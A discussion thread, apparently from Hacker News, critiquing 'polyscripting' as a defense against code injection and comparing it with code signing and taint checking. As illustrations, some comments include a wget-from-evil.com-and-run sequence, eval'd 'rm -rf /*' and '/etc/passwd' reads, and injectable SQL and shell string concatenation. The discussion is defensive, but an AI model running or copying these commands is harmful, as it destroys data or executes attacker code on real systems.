Polyscripting scrambles programming languages to prevent code injection
blog.polyverse.io
blog.polyverse.io
* Run web processes with minimum privileges
* No write access to the directories where your executable runs
* Audits for filesystem access and use of "eval"
* et cetera
The only reason we're entertaining this kind of idea is because people have legacy apps written in PHP that they need to deal with and keep running. Fine, but there are problems with this "polyscripting" approach... this looks substantially worse than, say, doing something more straightforward like signing your code with a cryptographic key and refusing to execute unsigned code. In fact, this looks like a hackneyed, amateurish way of doing exactly that, all while making the debugging experience immeasurably worse. Modifying PHP to only execute signed code would surely be trivial by comparison.
This a hack that doesn't even need to exist.
I don't see how this polyscripting thing is any better or worse than those dozens of existing mitigation technologies, apart from your point about debugging.
The problem with polyscripting is that it doesn’t provide any extra benefits that code signing doesn’t give you. In fact, it provides less security, more drawbacks, and has a greater implementation complexity (= attack surface) than code signing. With code signing you can be confident that someone with access to signed code can’t sign their own code, but with polyscripting as presented in the article, there does not appear to be any such assurance.
Polyscripting reminds me of all the hackneyed copy-protection or anti-reverse-engineering techniques we saw back in the 90s.
Dedicated interpreter/script pair is a cool idea, at least. The "impossible" also seems like an overstatement to me - it doesn't seem hard to reverse engineer the scramble that was applied, since there are frequently ways to get the ability to read the raw source of the file being executed (certainly against PHP), and if you can match it against a known source file (easy for open source libraries) you can use that 1:1 mapping to identify what scramble was used. Common code patterns show up all the time in source, and since the scramble preserves literals and structure it will be easy to identify the scrambled token based on the pattern.
The sad thing is even if this ends up being a great defensive technique, deploying it in practice would be a real pain because you're not running known-good packages or installers anymore, you have to build your own dedicated runtime/interpreter from scratch to match the scramble on your application. To avoid high risk, you probably need to change the scramble regularly, which means building the interp again. And if you use a different scramble per application (for sandboxing, etc) then you aren't getting page sharing between the native modules. :(
This kind of solution works well with the exception of pretty much any scripting-language. For example I hacked up a cute linux security module to allow executions by the kernel to be validated via userspace:
https://github.com/skx/linux-security-modules/tree/master/se...
You could also use SELinux, AppArmor, and similar traditional approaches. Once you've picked a solution you could then go on to sign `/bin/ls`, `/bin/bash`, etc, and deny the execution of unsigned binaries such that this would fail:
wget evil.com/root.sh
chmod 755 root.sh
./root.sh
(This example assumes that you'd even permit `wget` and `chmod` to run.)However the approach fails if you want to allow running perl, php, python-scripts, etc. You'd have to sign the interpreters so that they could run. But if you allow `python` to execute then there is no difference between:
python /path/to/good.py
and python /path/to/evil.py
Since the executable in both cases is `python`, not the script. You'd have to hack the interpeters to do signature validation on your scripts - and if you did that you'd almost certainly need to update all the standard-libraries to allow those to be loaded.(It is possible you could work around this via policies, but off the top of my head ..)
For example:
#!/usr/bin/perl
use module;
print "OK\n";
The module could have been modified by a local user too - so you need to check all libraries that are included/opened too? That would seem to be a lot of work.The proposed polyscripting mitigation already requires extensive changes to the interpreter. You have to generate a new grammar. Transform the current php, js, python, etc AST to the new grammar and then reimplement the interpreter to work on the generated grammar.
Implementing code signing in the interpreter is far simpler. A single method "checkSignature" and corresponding calls to it every time a script file is opened.
Just say no to string concatenation of command languages.
Plus this breaks practically any code that actually relies on dynamic PHP features to generate code, because now the code generators have to be manually edited to spit out obfuscated code instead of normal PHP.
Isn't scrambled code standard practice when you're writing PHP?
(I keed, I keed...)
Prepared queries?
Well, there are lots of ways to prevent code injection that aren't "scrambling the AST". But to "polyscript" your SQL, you have to modify your SQL engine.
What happens if you eval "`rm -rf /*`;" or "`grep root /etc/passwd`;"? Does it scramble backticks?
Note that I have not reviewed the code -- I'm only going by the claims in the article.
root:/pwd# cat scrambled.php
<?php
arFktyO “Hello, “;
arFktyO “Small World.\n”;
?>
In the above example, arFktyO = echo. This doesn't fix (imo) the most common instance of [something]-injection, which usually stems from string concatenation, i.e. sqlQuery = "SELECT * FROM table WHERE owner=" + userInput
execute(sqlQuery)
or command = "ls " + userInput
eval(command)Edit: as others say, why use this instead of code-signing.
CREATE VIEW oijweojf AS SELECT thing AS woeifj, stuff AS pokkx
Similarly, if you're shelling out, you can certainly set up a chroot jail with all the names scrambled.That said, you then need to integrate all this into a build and deploy process, and god help anyone who has to debug it.
Obviously, we want solutions that will remediate existing code unmodified, and I guess enabling taint mode isn't in that category.
I wonder what bugs taint checking wouldn't catch, that this would.
The better use would be obfucation of code to lock client to your services.